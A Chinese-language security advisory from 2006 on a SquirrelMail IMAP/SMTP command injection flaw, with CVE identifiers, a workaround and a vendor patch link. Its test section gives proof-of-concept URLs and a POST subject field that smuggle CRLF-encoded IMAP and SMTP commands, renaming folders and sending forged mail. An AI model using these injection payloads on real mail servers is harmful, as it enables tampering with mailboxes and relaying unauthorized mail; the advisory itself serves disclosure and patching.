安全中国首页 > 新闻中心 > 网站程序漏洞
 

SquirrelMail IMAP/SMTP命令注入漏洞

更新时间:2006-3-28 0:28:56
责任编辑:池天
热 点:
受影响系统:
SquirrelMail SquirrelMail <= 1.2.7
SquirrelMail SquirrelMail < 1.4.6
描述:
BUGTRAQ  ID: 16756
CVE(CAN) ID: CVE-2006-0195,CVE-2006-0377,CVE-2006-0188

SquirrelMail是一款流行的基于WEB的邮件服务程序。

SquirrelMail提供了通过IMAP和SMTP协议与邮件服务器交互的图形界面。在正常使用这些应用的时候,SquirrelMail没有正确的验证传输给邮件服务器的命令和信息,这允许恶意的认证用户在通讯过程中使用SquirrelMail Webmail前端的sqimap_mailbox_select命令参数向邮件服务器注入任意IMAP/SMTP命令。

<*来源:Vicente Aguilera Diaz (vaguilera@isecauditors.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114106555229158&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
http:///src/read_body.php?mailbox=INBOX%22%0D%0%0D%0A%20SELECT%20%22INBOX&passed_id=&startMessage=1
http:///src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1

创建特制POST请求:

POST http:///src/compose.php HTTP/1.1

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
...

回复不存在的邮件地址:

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept%0d%0a.%0d%0a%0d%0amail from:
hacker@domain.com%0d%0arcpt to:
victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a
-----------------------------84060780712450133071594948441
...

建议:
临时解决方法:

* 从$mailbox的sqimap_mailbox_select函数中替换\r和\n。

厂商补丁:

SquirrelMail
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.squirrelmail.org/security/issue/2006-02-15

 
安全中国网友投稿专用上传FTP空间:
Ftp服务器:download.anqn.com
Ftp端口:21
用户名:anqn
密 码:anqn.com
 
学习软件编程开发技术,推荐加入以下软件编程培训班:
易语言软件编程培训班(简单易学)  Delphi软件编程培训班  VC++软件编程培训班
VB软件编程培训班  JAVA高端编程就业研发班

学习网站开发制作技术,推荐加入以下网站开发培训班:
ASP.net网站开发项目实战班  ASP语言网站建设培训班

学习网络安全入侵防护技术,推荐加入以下技术培训班:
大型网络安全入侵防护班  网站脚本程序全方位安全检测班

学习网络管理、网吧运营维护技术(网管),推荐加入以下培训班:
大型网吧技术管理人才特训班  Linux网络嵌入架构工程师培训班

学习专项特殊技术,推荐加入以下专项技术培训班:
软件与游戏外挂脱壳破解班(逆向工程)  赚钱王道-网赚技能培训班  Flash动画设计师就业特训班